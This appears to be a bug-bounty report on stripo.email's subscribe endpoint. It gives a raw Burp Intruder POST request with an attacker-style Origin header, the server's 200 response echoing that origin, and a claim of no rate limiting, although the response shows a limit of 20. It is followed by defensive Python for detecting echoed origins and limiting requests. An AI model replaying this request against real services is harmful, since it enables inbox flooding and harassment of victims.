I found a rate-limiting bypass using Access-Control-Allow-Origin: look at the response, it comes back as 200.
Vulnerable.
No rate limit means there is no mechanism to protect against requests made in a short time frame. If the repetition doesn't give any error after 50, 100, 1000 repetitions, then there is no rate limit set. This vulnerability has been registered in #297359 #774050 #922470.
URL Affected
https://stripo.email/subscribe/
Payload position: § (null payloads), then run the Intruder request:
POST /subscribe/ HTTP/1.1
Host: stripo.email
X-Requested-With: XMLHttpRequest
Content-Length: 126
Origin: https://evil.stripo.email
Connection: close
Referer: https://evil.stripo.email/
_token=§§&source=LANDING&subscribe-email=hostbugbounty%40gmail.com&g-recaptcha-response=
Response (vulnerable)
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Nov 2020 04:33:08 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
X-RateLimit-Limit: 20
X-RateLimit-Remaining: 14
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: https://evil.stripo.email
Content-Length: 234
{"success":{"_token":"Zc3Jo8QdivuDDsaS8LhimIW8mVo88eRVl9FYrBi8","source":"LANDING","subscribe-email":"[email protected]","g-recaptcha-response":null},"message":"Thanks! You're subscribed, look for a confirmation email shortly."}
[CORS bypass, no rate limiting, vulnerable] An attacker can send subscription requests to the victim's email address from a cloud server.
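Added example, not part of the original report: a defender-side check for the two things the response above shows, an Access-Control-Allow-Origin header that echoes the attacker-chosen Origin and a subscribe endpoint that keeps answering 200 beyond its advertised X-RateLimit-Limit. The allowlist, the 60-second window, the client key and the sample IP are assumptions for illustration.

```python
from collections import defaultdict, deque

# Constructed copy of the relevant headers from the response in the report.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Access-Control-Allow-Origin: https://evil.stripo.email\r\n"
    "X-RateLimit-Limit: 20\r\n"
    "X-RateLimit-Remaining: 14\r\n\r\n"
)
ALLOWED_ORIGINS = {"https://stripo.email"}  # assumption: exact-match allowlist

def parse_headers(raw):
    """Return a dict of lower-cased header names from a raw HTTP response."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")[1:]  # drop status line
    pairs = (line.split(":", 1) for line in lines if ":" in line)
    return {k.strip().lower(): v.strip() for k, v in pairs}

def cors_reflects_origin(headers, request_origin, allowed=ALLOWED_ORIGINS):
    """True when the server echoes an Origin that is not on the allowlist,
    which is the misconfiguration visible in the response above."""
    acao = headers.get("access-control-allow-origin")
    return acao == request_origin and request_origin not in allowed

class SlidingWindowLimiter:
    """Per-key limiter: at most `limit` requests in any `window` seconds.
    hit() returns (allowed, remaining); callers answer 429 when not allowed."""
    def __init__(self, limit=20, window=60):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)  # key -> timestamps inside the window

    def hit(self, key, now):
        q = self.hits[key]
        while q and now - q[0] >= self.window:  # expire old timestamps
            q.popleft()
        if len(q) >= self.limit:
            return False, 0
        q.append(now)
        return True, self.limit - len(q)

def simulate_burst(count, limit=20):
    """Replay `count` subscribe requests from one client inside one window and
    return the status codes a correctly limited endpoint would send back.
    The client key (constructed IP plus target address) is an assumption."""
    limiter = SlidingWindowLimiter(limit=limit)
    codes = []
    for i in range(count):
        allowed, _ = limiter.hit(("203.0.113.5", "victim@example.com"), now=float(i))
        codes.append(200 if allowed else 429)
    return codes
```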